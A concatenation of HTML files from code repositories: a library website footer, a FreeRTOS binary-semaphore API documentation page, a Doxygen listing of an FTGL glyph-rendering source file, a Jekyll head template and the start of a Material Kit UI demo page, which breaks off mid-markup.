&amp; room hire</a></li> <li class="mb2 mb1-ns"><a href="/bloc/" class="link light-gray hover-white">BLOC</a></li> <li class="mb2 mb1-ns"><a href="/music-and-drama/" class="link light-gray hover-white">Music &amp; Drama Library</a></li> <li class="mb2 mb1-ns"><a href="/news/" class="link light-gray hover-white">News</a></li> <li class="mb2 mb1-ns"><a href="/about/jobs/" class="link light-gray hover-white">Jobs</a></li> <li class="mb2 mb1-ns"><a href="/volunteer/" class="link light-gray hover-white">Volunteering</a></li> <li class="mb2 mb1-ns"><a href="/about/" class="link light-gray hover-white">About us</a></li> </ul> </nav> </div> </div> <section class="pb4 f6"> <h2 class="f6 f5-ns pa0 ma0 mb2 tracked ttu normal ">Privacy &amp; cookies</h2> <ul class="list pa0 ma0"> <li class="mb2 mb1-ns">Find out what cookies we use and how we use your data: <a href="/help/privacy-and-cookies/" class="light-gray underline hover-white">our privacy policies</a>.</li> <li class="mb2 mb1-ns"><a href="/about/jobs/privacy-notice-for-job-applicants/" class="light-gray underline hover-white">Privacy notice for job applicants</a></li> </ul> </section> <div class="pb4 f6"> <p class="ma0 light-gray">Suffolk Libraries HMRC charity number XT34476. Registered company number IP031542.</p> </div> </div> </footer> </body> </html>
suffolklibraries/sljekyll
_site/new-suggestions/young-adult/wing-jones-by-katherine-webber/index.html
HTML
mit
21,399
<html> <head> <meta content="HTML Tidy for HTML5 for Linux version 5.2.0" name="generator"/> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"/> <meta content="Describes the xSemaphoreCreateBinaryStatic() RTOS API function which is part of the RTOS semaphore API source code function set." name="description"/> <meta content="vSemaphoreCreateBinaryStatic, semaphore, binary, binary semaphore, mutex, mailbox, RTOS mailbox, FreeRTOS API, RTOS API, RTOS" name="keywords"/> <title>xSemaphoreCreateBinaryStatic() RTOS API documentation</title> <link href="doxygen.css" rel="stylesheet"/> <style type="text/css"> </style> <meta content="width=device-width, initial-scale=1.0" name="viewport"/> <script src="banners.js" type="text/javascript"> </script> <script src="stlib.js" type="text/javascript"> </script> <script src="left_menu.js" type="text/javascript"> </script> <script src="http://code.jquery.com/jquery-latest.js" type="text/javascript"> </script> <script src="http://code.jquery.com/ui/1.11.0/jquery-ui.js"> </script> <link href="code.jquery.com/ui/1.11.0/themes/smoothness/jquery-ui.css" rel="stylesheet"/> <script type="text/javascript"> window.onload = function() { var rect1 = document.getElementById( 'td_right_side_bar' ).getBoundingClientRect(); if( rect1.right >= window.innerWidth ) { document.getElementById( 'td_right_side_bar' ).style.display = 'none'; document.getElementById( 'td_right_side_bar' ).style.width = '0'; } }; </script> <script type="text/javascript"> var _gaq = _gaq || []; _gaq.push(['_setAccount', 'UA-6086815-2']); _gaq.push(['_setDomainName', 'freertos.org']); _gaq.push(['_trackPageview']); (function() { var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true; ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s); })(); </script> <script type="text/javascript"> function check_left_image_clash() { var rect1 = document.getElementById( 'left_banner_image' ).getBoundingClientRect(); var rect2 = document.getElementById( 'id_tree_menu' ).getBoundingClientRect(); if ( rect1.right >= rect2.left ) { document.getElementById( 'td_left_side_bar' ).style.display = 'none'; document.getElementById( 'td_left_side_bar' ).style.width = '0'; } } </script> <script type="text/javascript"> function check_right_image_clash() { var rect1 = document.getElementById( 'td_right_side_bar' ).getBoundingClientRect(); if( rect1.right >= window.innerWidth ) { document.getElementById( 'td_right_side_bar' ).style.display = 'none'; document.getElementById( 'td_right_side_bar' ).style.width = '0'; } } </script> <script type="text/javascript"> $( document ).ready( function() { window.setTimeout("blindDownMenuHint();", 5000); window.setTimeout("blindUpMenuHint();", 12000); } ) function blindDownMenuHint() { if( window.name != "done" ) { $( "#menu_hint").show( "blind", "slow" ); window.name = "done"; } } function blindUpMenuHint() { $( "#menu_hint").hide( "blind", "slow" ); } </script></head> <body><font face="Arial"><a id="page_top" name="page_top"/></font> <table> <tbody> <tr> <td valign="top"> <!-- Content area - the other td is the side bar area. --> <table align="center" cellpadding="5" cellspacing="0" style="height:100%;background:white; border-left:solid 1px #f0f0f0; border-right:solid 1px #f0f0f0;"> <tbody> <tr valign="top"> <td colspan="3" style="height:100px;"> <!-- Spans the left menu, blank line, and main content columns of the next row. --> <table border="0" cellpadding="0" cellspacing="2" style="width:100%;"><!-- Rows for logos and banners, blue lines with menu. --> <tbody> <tr style="padding: 0px 0px 0px 0px;"><!-- Top row, banner and logo. --> <td> <table cellpadding="0" cellspacing="5px" style="table-layout:fixed;" width="100%"> <tbody> <tr> <td id="logo_column" style="line-height:normal;" valign="middle" width="174px"> <div style="float:left;"><a href="index.html"><img alt="Free RTOS logo" border="0" src="logo.jpg" style="padding: 0 0 0 5px;" width="164px"/></a></div> </td> <td style="width:5px; border-top:solid 2px #e6e6e6; border-left:solid 2px #e6e6e6; border-bottom:solid 2px #e6e6e6;"> &nbsp;</td> <td id="page_heading_largerx" style="line-height:normal; width:324px;" valign="middle"> <h3>Quality RTOS &amp; Embedded Software<br/> </h3> </td> <td> </td> </tr> </tbody> </table> </td> </tr> <tr bgcolor="#7095D3" style="height:5px;"><!-- Blank line. --> <td/> </tr> <tr bgcolor="#B6CFFE" style="height:19px;"><!-- Horizontal menu. --> <td bgcolor="#B6CFFE" valign="middle"> <!-- Top menu with social media icons. --> <table cellpadding="0" cellspacing="0" style="padding-top:4px;"><!-- Top horizontal menu. --> <tbody> <tr> <td width="4px"> <!-- Just brings the first white menu spacing bar in from the left of the blue bar. --></td> <td align="center" style="border-right:solid 2px white; border-left:solid 2px white; width:100px; line-height:normal;"/> <td align="center" style="border-right:solid 2px white; width:112px; line-height:normal;"/> <td align="center" style="border-right:solid 2px white; width:104px; line-height:normal;"/> <td align="center" style="border-right:solid 2px white; width:94px; line-height:normal;"/> <td align="center" style="border-right:solid 2px white; width:94px; line-height:normal;"/> <td align="center" style="border-right:solid 2px white; width:90px; line-height:normal;"/> <td align="center" style="border-right:solid 2px white; width:90px; line-height:normal;"/> </tr> </tbody> </table> </td> </tr> </tbody> </table> </td> </tr> <tr valign="top"><!-- Main content row with menu and content area columns. --> <td style="width:2px; padding-right:0; padding-left:0;"> <!-- Blank column. --> <!-- Just to move the main text away from the silver verticle line slightly. --></td> <td id="td_main_content_column"><!-- Main content area. --> <table border="0" cellpadding="0" cellspacing="0" id="menu_hint" style="height:30px; background:#ffff99; display:none;"> <tbody> <tr valign="middle"> <td width="5px"/> <td width="30px"><img border="0" height="25px" src="menu_hint_arrow.png" style="padding:0;"/></td> <td valign="middle">Hint: Use the tree menu to navigate groups of related pages &nbsp;</td> </tr> </tbody> </table> <h1>xSemaphoreCreateBinaryStatic<br/> <small>[<a class="el" href="a00113.html">Semaphores</a>]</small></h1> <div align="center"> <table bgcolor="#B6CFFE" cellpadding="3" cellspacing="0"> <tbody> <tr> <td align="center" style="border:solid 1px white; background-color:#7095d3;"><a href="RTOS_Task_Notification_As_Binary_Semaphore.html" style="color:white;"><b>&nbsp;TIP: In many usage scenarios it is faster and more memory efficient to use a direct to task notification instead of a binary semaphore&nbsp;</b></a></td> </tr> </tbody> </table> </div> <p>semphr. h</p> <pre><font face="courier"> SemaphoreHandle_t xSemaphoreCreateBinaryStatic( StaticSemaphore_t *pxSemaphoreBuffer ); </font></pre> <p>Creates a <a href="Embedded-RTOS-Binary-Semaphores.html">binary semaphore</a>, and returns a handle by which the semaphore can be referenced. <a href="a00110.html#configSUPPORT_STATIC_ALLOCATION">configSUPPORT_STATIC_ALLOCATION</a> must be set to 1 in FreeRTOSConfig.h for this RTOS API function to be available.</p> <p>Each binary semaphore require a small amount of RAM that is used to hold the semaphore's state. If a binary semaphore is created using <a href="xSemaphoreCreateBinary.html">xSemaphoreCreateBinary()</a> then the required RAM is automatically allocated from the <a href="a00111.html">FreeRTOS heap</a>. If a binary semaphore is created using xSemaphoreCreateBinaryStatic() then the RAM is provided by the application writer, which requires an additional parameter, but allows the RAM to be statically allocated at compile time. See the <a href="Static_Vs_Dynamic_Memory_Allocation.html">Static Vs Dynamic allocation</a> page for more information.</p> <p>The semaphore is created in the 'empty' state, meaning the semaphore must first be given using the <a href="a00123.html">xSemaphoreGive()</a> API function before it can subsequently be taken (obtained) using the <a href="a00122.html">xSemaphoreTake</a>() function.</p> <p>Binary semaphores and <a href="CreateMutex.html">mutexes</a> are very similar but have some subtle differences: Mutexes include a priority inheritance mechanism, binary semaphores do not. This makes binary semaphores the better choice for implementing synchronisation (between tasks or between tasks and an interrupt), and mutexes the better choice for implementing simple mutual exclusion.</p> <p>A binary semaphore need not be given back once obtained, so task synchronisation can be implemented by one task/interrupt continuously 'giving' the semaphore while another continuously 'takes' the semaphore. This is demonstrated by the sample code on the <a href="a00124.html">xSemaphoreGiveFromISR()</a> documentation page. Note the same functionality can often be achieved in a more efficient way using a <a href="RTOS_Task_Notification_As_Binary_Semaphore.html">direct to task notification</a>.</p> <p>The priority of a task that 'takes' a mutex can potentially be raised if another task of higher priority attempts to obtain the same mutex. The task that owns the mutex 'inherits' the priority of the task attempting to 'take' the same mutex. This means the mutex must always be 'given' back - otherwise the higher priority task will never be able to obtain the mutex, and the lower priority task will never 'disinherit' the priority. An example of a mutex being used to implement mutual exclusion is provided on the <a href="a00122.html">xSemaphoreTake()</a> documentation page.</p> <p>Both mutex and binary semaphores are referenced by variables of type SemaphoreHandle_t and can be used in any task level API function that takes a parameter of that type. Unlike mutexes, binary semaphores can be used in interrupt service routines.</p> <dl compact="compact"> <dt><b>Parameters:</b></dt> <dd> <table border="0" cellpadding="0" cellspacing="10"> <tbody> <tr> <td valign="top"><font face="arial"><em>pxSemaphoreBuffer</em></font> &nbsp;</td> <td><font face="arial">Must point to a variable of type StaticSemaphore_t, which will be used to hold the semaphore's state.</font></td> </tr> </tbody> </table> </dd> </dl> <dl compact="compact"> <dt><b>Return values:</b></dt> <dd> <table border="0" cellpadding="0" cellspacing="10"> <tbody> <tr> <td valign="top"><em>NULL</em> &nbsp;</td> <td><font face="arial">The semaphore could not be created because pxSemaphoreBuffer was NULL.</font></td> </tr> <tr> <td valign="top"><em>Any other value</em> &nbsp;</td> <td><font face="arial">The semaphore was created successfully. The returned value is a handle by which the semaphore can be referenced.</font></td> </tr> </tbody> </table> </dd> </dl> <b>Example usage:</b> <pre> SemaphoreHandle_t xSemaphore = NULL; StaticSemaphore_t xSemaphoreBuffer; void vATask( void * pvParameters ) { <font color="green">/* Create a binary semaphore without using any dynamic memory allocation. The semaphore's data structures will be saved into the xSemaphoreBuffer variable. */</font> xSemaphore = xSemaphoreCreateBinaryStatic( &amp;xSemaphoreBuffer ); <font color="green">/* The pxSemaphoreBuffer was not NULL, so it is expected that the handle will not be NULL. */</font> <a href="a00110.html#configASSERT">configASSERT</a>( xSemaphore ); <font color="green">/* Rest of the task code goes here. */</font> } </pre> <br/> <br/> <br/> <br/> <p><br/> </p> <div align="center"><a href="#page_top"><small>[ Back to the top ]</small></a> &nbsp;&nbsp; <a href="RTOS.html"><small>[ About FreeRTOS ]</small></a> &nbsp;&nbsp; <a href="index.html"><small>[ Sitemap ]</small></a> &nbsp;&nbsp; <small>[ <script type="text/javascript"> <!-- var v2="54Z5C4TRXBFU5TYAC";var v7=unescape("%5CZ%3CZ%03R%267%3D02%3AFz63%24");var v5=v2.length;var v1="";for(var v4=0;v4<v5;v4++){v1+=String.fromCharCode(v2.charCodeAt(v4)^v7.charCodeAt(v4));}document.write('<a href="javascript:void(0)" onclick="window.location=\'mail\u0074o\u003a'+v1+'?subject=Website%20feedback'+'\'">'+'Report an error on this page<\/a>'); //--> </script></small> <noscript/> <a href="http://w2.syronex.com/jmr/safemailto/#noscript">Report an error on this page (with anti-spam)</a> ]</div> <br/> <p><br/> </p> <p><br/> </p> <p><br/> </p> <div align="center" class="text_ad"><font size="1">Copyright (C) 2004-2010 Richard Barry. Copyright (C) 2010-2016 Real Time Engineers Ltd.<br/> Any and all data, files, source code, html content and documentation included in the FreeRTOS<small><sup>TM</sup></small> distribution or available on this site are the exclusive property of Real Time Engineers Ltd.. See the files license.txt (included in the distribution) and this <a href="copyright.html">copyright notice</a> for more information. FreeRTOS<sup>TM</sup> and FreeRTOS.org<sup>TM</sup> are trade marks of Real Time Engineers Ltd.</font></div> </td> </tr> </tbody> </table> </td> </tr> </tbody> </table> <script language="JavaScript" type="text/javascript"> <!-- document.getElementById('banner_div').innerHTML = show_banners2(); //--> </script></body> </html>
hmbar/epd-embedded-web
freertos/xSemaphoreCreateBinaryStatic.html
HTML
mit
19,919
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/> <meta http-equiv="X-UA-Compatible" content="IE=9"/> <meta name="generator" content="Doxygen 1.8.6"/> <title>FTGL: FTOutlineGlyph.cpp Source File</title> <link href="tabs.css" rel="stylesheet" type="text/css"/> <script type="text/javascript" src="jquery.js"></script> <script type="text/javascript" src="dynsections.js"></script> <link href="doxygen.css" rel="stylesheet" type="text/css" /> </head> <body> <div id="top"><!-- do not remove this div, it is closed by doxygen! --> <div id="titlearea"> <table cellspacing="0" cellpadding="0"> <tbody> <tr style="height: 56px;"> <td style="padding-left: 0.5em;"> <div id="projectname">FTGL &#160;<span id="projectnumber">2.1</span> </div> </td> </tr> </tbody> </table> </div> <!-- end header part --> <!-- Generated by Doxygen 1.8.6 --> <div id="navrow1" class="tabs"> <ul class="tablist"> <li><a href="index.html"><span>Main&#160;Page</span></a></li> <li class="current"><a href="files.html"><span>Files</span></a></li> </ul> </div> <div id="navrow2" class="tabs2"> <ul class="tablist"> <li><a href="files.html"><span>File&#160;List</span></a></li> <li><a href="globals.html"><span>Globals</span></a></li> </ul> </div> <div id="nav-path" class="navpath"> <ul> <li class="navelem"><a class="el" href="dir_68267d1309a1af8e8297ef4c3efbcdba.html">src</a></li> </ul> </div> </div><!-- top --> <div class="header"> <div class="headertitle"> <div class="title">FTOutlineGlyph.cpp</div> </div> </div><!--header--> <div class="contents"> <a href="FTOutlineGlyph_8cpp.html">Go to the documentation of this file.</a><div class="fragment"><div class="line"><a name="l00001"></a><span class="lineno"> 1</span>&#160;<span class="preprocessor">#include &quot;FTOutlineGlyph.h&quot;</span></div> <div class="line"><a name="l00002"></a><span class="lineno"> 2</span>&#160;<span class="preprocessor">#include &quot;FTVectoriser.h&quot;</span></div> <div class="line"><a name="l00003"></a><span class="lineno"> 3</span>&#160;</div> <div class="line"><a name="l00004"></a><span class="lineno"> 4</span>&#160;</div> <div class="line"><a name="l00005"></a><span class="lineno"> 5</span>&#160;FTOutlineGlyph::FTOutlineGlyph( FT_GlyphSlot glyph, <span class="keywordtype">bool</span> useDisplayList)</div> <div class="line"><a name="l00006"></a><span class="lineno"> 6</span>&#160;: FTGlyph( glyph),</div> <div class="line"><a name="l00007"></a><span class="lineno"> 7</span>&#160; glList(0)</div> <div class="line"><a name="l00008"></a><span class="lineno"> 8</span>&#160;{</div> <div class="line"><a name="l00009"></a><span class="lineno"> 9</span>&#160; <span class="keywordflow">if</span>( ft_glyph_format_outline != glyph-&gt;format)</div> <div class="line"><a name="l00010"></a><span class="lineno"> 10</span>&#160; {</div> <div class="line"><a name="l00011"></a><span class="lineno"> 11</span>&#160; err = 0x14; <span class="comment">// Invalid_Outline</span></div> <div class="line"><a name="l00012"></a><span class="lineno"> 12</span>&#160; <span class="keywordflow">return</span>;</div> <div class="line"><a name="l00013"></a><span class="lineno"> 13</span>&#160; }</div> <div class="line"><a name="l00014"></a><span class="lineno"> 14</span>&#160;</div> <div class="line"><a name="l00015"></a><span class="lineno"> 15</span>&#160; FTVectoriser vectoriser( glyph);</div> <div class="line"><a name="l00016"></a><span class="lineno"> 16</span>&#160;</div> <div class="line"><a name="l00017"></a><span class="lineno"> 17</span>&#160; <span class="keywordtype">size_t</span> numContours = vectoriser.ContourCount();</div> <div class="line"><a name="l00018"></a><span class="lineno"> 18</span>&#160; <span class="keywordflow">if</span> ( ( numContours &lt; 1) || ( vectoriser.PointCount() &lt; 3))</div> <div class="line"><a name="l00019"></a><span class="lineno"> 19</span>&#160; {</div> <div class="line"><a name="l00020"></a><span class="lineno"> 20</span>&#160; <span class="keywordflow">return</span>;</div> <div class="line"><a name="l00021"></a><span class="lineno"> 21</span>&#160; }</div> <div class="line"><a name="l00022"></a><span class="lineno"> 22</span>&#160;</div> <div class="line"><a name="l00023"></a><span class="lineno"> 23</span>&#160; <span class="keywordflow">if</span>(useDisplayList)</div> <div class="line"><a name="l00024"></a><span class="lineno"> 24</span>&#160; {</div> <div class="line"><a name="l00025"></a><span class="lineno"> 25</span>&#160; glList = glGenLists(1);</div> <div class="line"><a name="l00026"></a><span class="lineno"> 26</span>&#160; glNewList( glList, GL_COMPILE);</div> <div class="line"><a name="l00027"></a><span class="lineno"> 27</span>&#160; }</div> <div class="line"><a name="l00028"></a><span class="lineno"> 28</span>&#160; </div> <div class="line"><a name="l00029"></a><span class="lineno"> 29</span>&#160; <span class="keywordflow">for</span>( <span class="keywordtype">unsigned</span> <span class="keywordtype">int</span> c = 0; c &lt; numContours; ++c)</div> <div class="line"><a name="l00030"></a><span class="lineno"> 30</span>&#160; {</div> <div class="line"><a name="l00031"></a><span class="lineno"> 31</span>&#160; <span class="keyword">const</span> FTContour* contour = vectoriser.Contour(c);</div> <div class="line"><a name="l00032"></a><span class="lineno"> 32</span>&#160; </div> <div class="line"><a name="l00033"></a><span class="lineno"> 33</span>&#160; glBegin( GL_LINE_LOOP);</div> <div class="line"><a name="l00034"></a><span class="lineno"> 34</span>&#160; <span class="keywordflow">for</span>( <span class="keywordtype">unsigned</span> <span class="keywordtype">int</span> pointIndex = 0; pointIndex &lt; contour-&gt;PointCount(); ++pointIndex)</div> <div class="line"><a name="l00035"></a><span class="lineno"> 35</span>&#160; {</div> <div class="line"><a name="l00036"></a><span class="lineno"> 36</span>&#160; FTPoint point = contour-&gt;Point(pointIndex);</div> <div class="line"><a name="l00037"></a><span class="lineno"> 37</span>&#160; glVertex2f( point.X() / 64.0f, point.Y() / 64.0f);</div> <div class="line"><a name="l00038"></a><span class="lineno"> 38</span>&#160; }</div> <div class="line"><a name="l00039"></a><span class="lineno"> 39</span>&#160; glEnd();</div> <div class="line"><a name="l00040"></a><span class="lineno"> 40</span>&#160; }</div> <div class="line"><a name="l00041"></a><span class="lineno"> 41</span>&#160;</div> <div class="line"><a name="l00042"></a><span class="lineno"> 42</span>&#160; <span class="keywordflow">if</span>(useDisplayList)</div> <div class="line"><a name="l00043"></a><span class="lineno"> 43</span>&#160; {</div> <div class="line"><a name="l00044"></a><span class="lineno"> 44</span>&#160; glEndList();</div> <div class="line"><a name="l00045"></a><span class="lineno"> 45</span>&#160; }</div> <div class="line"><a name="l00046"></a><span class="lineno"> 46</span>&#160;}</div> <div class="line"><a name="l00047"></a><span class="lineno"> 47</span>&#160;</div> <div class="line"><a name="l00048"></a><span class="lineno"> 48</span>&#160;</div> <div class="line"><a name="l00049"></a><span class="lineno"> 49</span>&#160;FTOutlineGlyph::~FTOutlineGlyph()</div> <div class="line"><a name="l00050"></a><span class="lineno"> 50</span>&#160;{</div> <div class="line"><a name="l00051"></a><span class="lineno"> 51</span>&#160; glDeleteLists( glList, 1);</div> <div class="line"><a name="l00052"></a><span class="lineno"> 52</span>&#160;}</div> <div class="line"><a name="l00053"></a><span class="lineno"> 53</span>&#160;</div> <div class="line"><a name="l00054"></a><span class="lineno"> 54</span>&#160;</div> <div class="line"><a name="l00055"></a><span class="lineno"> 55</span>&#160;<span class="keyword">const</span> FTPoint&amp; FTOutlineGlyph::Render( <span class="keyword">const</span> FTPoint&amp; pen)</div> <div class="line"><a name="l00056"></a><span class="lineno"> 56</span>&#160;{</div> <div class="line"><a name="l00057"></a><span class="lineno"> 57</span>&#160; glTranslatef( pen.X(), pen.Y(), 0.0f);</div> <div class="line"><a name="l00058"></a><span class="lineno"> 58</span>&#160;</div> <div class="line"><a name="l00059"></a><span class="lineno"> 59</span>&#160; <span class="keywordflow">if</span>( glList)</div> <div class="line"><a name="l00060"></a><span class="lineno"> 60</span>&#160; {</div> <div class="line"><a name="l00061"></a><span class="lineno"> 61</span>&#160; glCallList( glList);</div> <div class="line"><a name="l00062"></a><span class="lineno"> 62</span>&#160; }</div> <div class="line"><a name="l00063"></a><span class="lineno"> 63</span>&#160; </div> <div class="line"><a name="l00064"></a><span class="lineno"> 64</span>&#160; <span class="keywordflow">return</span> advance;</div> <div class="line"><a name="l00065"></a><span class="lineno"> 65</span>&#160;}</div> <div class="line"><a name="l00066"></a><span class="lineno"> 66</span>&#160;</div> </div><!-- fragment --></div><!-- contents --> <!-- start footer part --> <hr class="footer"/><address class="footer"><small> Generated on Tue Sep 16 2014 09:17:19 for FTGL by &#160;<a href="http://www.doxygen.org/index.html"> <img class="footer" src="doxygen.png" alt="doxygen"/> </a> 1.8.6 </small></address> </body> </html>
TabitaPL/Pasjans
Angel-3.2/Code/Angel/Libraries/FTGL/unix/docs/html/FTOutlineGlyph_8cpp_source.html
HTML
mit
9,853
<head> <meta charset="utf-8"> <title>{% if page.title %}{{ page.title }} |{% endif %} {{ site.theme.title }}</title> <meta name="description" content="{% if page.excerpt %}{{ page.excerpt | strip_html | strip_newlines | truncate: 160 }}{% else %}{{ site.theme.description }}{% endif %}"> <meta name="viewport" content="width=device-width, initial-scale=1"> <!-- CSS --> <link rel="stylesheet" href="{{ "/css/main.css" | prepend: site.baseurl }}"> <!--Favicon--> <link rel="shortcut icon" href="{{ "/favicon.ico" | prepend: site.baseurl }}" type="image/x-icon"> <!-- Canonical --> <link rel="canonical" href="{{ page.url | replace:'index.html','' | prepend: site.baseurl | prepend: site.url }}"> <!-- RSS --> <link rel="alternate" type="application/atom+xml" title="{{ site.theme.title }}" href="{{ "/feed.xml" | prepend: site.baseurl | prepend: site.url }}" /> <!-- Font Awesome --> <link href="//maxcdn.bootstrapcdn.com/font-awesome/4.2.0/css/font-awesome.min.css" rel="stylesheet"> <!-- Google Fonts --> <link href="//fonts.googleapis.com/css?family=Source+Sans+Pro:400,700,700italic,400italic" rel="stylesheet" type="text/css"> <link rel="stylesheet" href="/css/syntax.css"> <!-- Google Analytics --> {% if site.theme.google_analytics %} <script> (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','//www.google-analytics.com/analytics.js','ga'); ga('create', '{{ site.theme.google_analytics }}', 'auto'); ga('send', 'pageview'); </script> {% endif %} </head>
vnctaing/blog
_includes/head.html
HTML
mit
1,719
<!doctype html> <html lang="en"> <head> <meta charset="utf-8" /> <link rel="apple-touch-icon" sizes="76x76" href="assets/img/apple-icon.png"> <link rel="icon" type="image/png" href="assets/img/favicon.png"> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" /> <title>Material Kit by Creative Tim</title> <meta content='width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0' name='viewport' /> <!-- Fonts and icons --> <link rel="stylesheet" href="//fonts.googleapis.com/icon?family=Material+Icons" /> <link rel="stylesheet" type="text/css" href="//fonts.googleapis.com/css?family=Roboto:300,400,500,700" /> <link rel="stylesheet" href="//maxcdn.bootstrapcdn.com/font-awesome/latest/css/font-awesome.min.css" /> <!-- CSS Files --> <link href="assets/css/bootstrap.min.css" rel="stylesheet" /> <link href="assets/css/material-kit.css" rel="stylesheet"/> <!-- CSS Just for demo purpose, don't include it in your project --> <link href="assets/css/demo.css" rel="stylesheet" /> </head> <body class="index-page"> <!-- Navbar --> <nav class="navbar navbar-transparent navbar-fixed-top navbar-color-on-scroll"> <div class="container"> <div class="navbar-header"> <button type="button" class="navbar-toggle" data-toggle="collapse" data-target="#navigation-index"> <span class="sr-only">Toggle navigation</span> <span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> </button> <a href="http://www.creative-tim.com"> <div class="logo-container"> <div class="logo"> <img src="assets/img/logo.png" alt="Creative Tim Logo" rel="tooltip" title="<b>Material Kit</b> was Designed & Coded with care by the staff from <b>Creative Tim</b>" data-placement="bottom" data-html="true"> </div> <div class="brand"> Creative Tim </div> </div> </a> </div> <div class="collapse navbar-collapse" id="navigation-index"> <ul class="nav navbar-nav navbar-right"> <li> <a href="components-documentation.html" target="_blank"> <i class="material-icons">dashboard</i> Components </a> </li> <li> <a href="http://demos.creative-tim.com/material-kit-pro/presentation.html?ref=utp-freebie" target="_blank"> <i class="material-icons">unarchive</i> Upgrade to PRO </a> </li> <li> <a rel="tooltip" title="Follow us on Twitter" data-placement="bottom" href="//twitter.com/CreativeTim" target="_blank" class="btn btn-white btn-simple btn-just-icon"> <i class="fa fa-twitter"></i> </a> </li> <li> <a rel="tooltip" title="Like us on Facebook" data-placement="bottom" href="//www.facebook.com/CreativeTim" target="_blank" class="btn btn-white btn-simple btn-just-icon"> <i class="fa fa-facebook-square"></i> </a> </li> <li> <a rel="tooltip" title="Follow us on Instagram" data-placement="bottom" href="//www.instagram.com/CreativeTimOfficial" target="_blank" class="btn btn-white btn-simple btn-just-icon"> <i class="fa fa-instagram"></i> </a> </li> </ul> </div> </div> </nav> <!-- End Navbar --> <div class="wrapper"> <div class="header header-filter" style="background-image: url('assets/img/bg2.jpeg');"> <div class="container"> <div class="row"> <div class="col-md-8 col-md-offset-2"> <div class="brand"> <h1>Material Kit.</h1> <h3>A Badass Bootstrap UI Kit based on Material Design.</h3> </div> </div> </div> </div> </div> <div class="main main-raised"> <div class="section section-basic"> <div class="container"> <div class="title"> <h2>Basic Elements</h2> </div> <div id="buttons"> <div class="title"> <h3>Buttons <br /> <small>Pick your style</small> </h3> </div> <div class="row"> <div class="col-md-8 col-md-offset-2"> <button class="btn btn-primary">Default</button> <button class="btn btn-primary btn-round">Round</button> <button class="btn btn-primary btn-round"> <i class="material-icons">favorite</i> With Icon </button> <button class="btn btn-primary btn-fab btn-fab-mini btn-round"> <i class="material-icons">favorite</i> </button> <button class="btn btn-primary btn-simple">Simple</button> </div> </div> <div class="title"> <h3><small>Pick your size</small></h3> </div> <div class="row"> <div class="col-md-8 col-md-offset-2"> <button class="btn btn-primary btn-xs">x-Small</button> <button class="btn btn-primary btn-sm">Small</button> <button class="btn btn-primary">Regular</button> <button class="btn btn-primary btn-lg">Large</button> </div> </div> <div class="title"> <h3><small> Pick your color </small></h3> </div> <div class="row"> <div class="col-md-8 col-md-offset-2"> <button class="btn">Default</button> <button class="btn btn-primary">Primary</button> <button class="btn btn-info">Info</button> <button class="btn btn-success">Success</button> <button class="btn btn-warning">Warning</button> <button class="btn btn-danger">Danger</button> </div> </div> <div class="title"> <h3>Links</h3> </div> <div class="row"> <div class="col-md-8 col-md-offset-2"> <button class="btn btn-simple">Default</button> <button class="btn btn-simple btn-primary ">Primary</button> <button class="btn btn-simple btn-info">Info</button> <button class="btn btn-simple btn-success">Success</button> <button class="btn btn-simple btn-warning">Warning</button> <button class="btn btn-simple btn-danger">Danger</button> </div> </div> </div> <div id="inputs"> <div class="title"> <h3>Inputs</h3> </div> <div class="row"> <div class="col-sm-3"> <div class="form-group"> <input type="text" value="" placeholder="Regular" class="form-control" /> </div> </div> <div class="col-sm-3"> <div class="form-group label-floating"> <label class="control-label">With Floating Label</label> <input type="email" class="form-control"> </div> </div> <div class="col-sm-3"> <div class="form-group label-floating has-success"> <label class="control-label">Success input</label> <input type="text" value="Success" class="form-control" /> <span class="form-control-feedback"> <i class="material-icons">done</i> </span> </div> </div> <div class="col-sm-3"> <div class="form-group label-floating has-error"> <label class="control-label">Error input</label> <input type="email" value="Error Input" class="form-control" /> <span class="material-icons form-control-feedback">clear</span> </div> </div> <div class="col-sm-3"> <div class="input-group"> <span class="input-group-addon"> <i class="material-icons">group</i> </span> <input type="text" class="form-control" placeholder="With Material Icons"> </div> </div> <div class="col-sm-3"> <div class="input-group"> <span class="input-group-addon"> <i class="fa fa-group"></i> </span> <input type="text" class="form-control" placeholder="With Font Awesome Icons"> </div> </div> </div> </div> <div class="space-70"></div> <div id="checkRadios"> <div class="row"> <div class="col-sm-3"> <div class="title"> <h3>Checkboxes</h3> </div> <div class="checkbox"> <label> <input type="checkbox" name="optionsCheckboxes"> Unchecked </label> </div> <div class="checkbox"> <label> <input type="checkbox" name="optionsCheckboxes" checked> Checked </label> </div> <div class="checkbox"> <label> <input type="checkbox" name="optionsCheckboxes" disabled> Disabled Unchecked </label> </div> <div class="checkbox"> <label> <input type="checkbox" name="optionsCheckboxes" disabled checked> Disabled Checked </label> </div> </div> <div class="col-sm-3"> <div class="title"> <h3>Radio Buttons</h3> </div> <div class="radio"> <label> <input type="radio" name="optionsRadios"> Radio is off </label> </div> <div class="radio"> <label> <input type="radio" name="optionsRadios" checked="true"> Radio is on </label> </div> <div class="radio"> <label> <input type="radio" name="optionsRadiosDisabled" disabled> Disabled Radio is off </label> </div> <div class="radio"> <label> <input type="radio" name="optionsRadiosDisabled" checked="true" disabled> Disabled Radio is on </label> </div> </div> <div class="col-sm-3"> <div class="title"> <h3>Toggle Buttons</h3> </div> <div class="togglebutton"> <label> <input type="checkbox" checked=""> Toggle is on </label> </div> <div class="togglebutton"> <label> <input type="checkbox"> Toggle is off </label> </div> </div> <div class="col-sm-3"> <div class="title"> <h3>Sliders</h3> </div> <div id="sliderRegular" 